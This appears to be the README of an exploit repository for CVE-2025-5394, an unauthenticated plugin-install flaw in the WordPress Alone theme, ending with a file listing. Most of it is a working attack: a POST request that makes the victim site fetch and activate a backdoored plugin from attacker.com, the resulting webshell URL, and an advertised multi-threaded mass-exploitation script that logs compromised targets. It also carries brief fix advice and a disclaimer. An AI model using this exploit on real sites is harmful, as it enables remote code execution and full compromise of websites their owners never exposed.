Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation# CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation
🔥 **Vulnerability Summary**
The WordPress theme **Alone** versions <= 7.8.3 is vulnerable to an **unauthenticated arbitrary file upload** vulnerability. This flaw allows **unauthenticated attackers** to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint — resulting in **remote code execution (RCE)** by deploying backdoored plugins.
This vulnerability stems from the `beplus_import_pack_install_plugin` function exposed to the public via `wp_ajax_nopriv_` without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.
🔍 **Affected Theme**
- **Theme Name:** Alone – Charity Multipurpose Non-profit WordPress Theme
- **Affected Version:** <= 7.8.3
- **Vulnerability Type:** Unauthenticated Arbitrary File Upload → RCE
- **CVE ID:** CVE-2025-5394
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Full remote code execution (RCE) and full site compromise
🧪 **Exploit Features**
- 🔓 **No authentication required**
- 📦 **Uploads malicious plugin ZIP** directly from remote URL
- 🚀 **Automatically installs and activates** the plugin
- 🐚 **Webshell delivery supported** via embedded PHP in plugin
- ✅ **AJAX endpoint accessible by unauthenticated users:**
`/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin`
🧠 **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
🚀 **Usage**
1. Prepare a malicious plugin ZIP file hosted on a server you control.
- Must contain a valid plugin header (`Plugin Name:`) and PHP backdoor (e.g., `bk.php`)
2. Craft the following POST request:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
```
3. If successful, the plugin is installed and activated. Access your shell at:
```
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
```
🧰 **Mass Exploitation Script**
This repository includes a mass exploit tool with:
- Multi-threaded processing
- Automatic HTTPS prefixing (if missing)
- Live logging of successful targets to `result.txt`
See [`mass_beplus_exploit.py`](./mass_beplus_exploit.py) for details.
🛠 **Fix Recommendations**
- Theme authors should remove or secure the `wp_ajax_nopriv_beplus_import_pack_install_plugin` hook.
- Implement authentication/capability checks (e.g., `current_user_can('install_plugins')`)
- Validate and restrict plugin sources.
- Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.
🔒 **Disclaimer:**
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.
📚 **Reference:**
- [Wordfence Advisory – CVE-2025-5394](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/alone/alone-charity-multipurpose-non-profit-wordpress-theme-783-missing-authorization-to-unauthenticated-arbitrary-file-upload-via-plugin-installation)
CVE: CVE-2025-5394
Researcher: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
[4.0K] /data/pocs/81e7fc5ab68936da8e3cd6cbad24c3837188fcf0
├── [1.7K] mass_beplus_exploit.py
└── [3.4K] README.md
0 directories, 2 files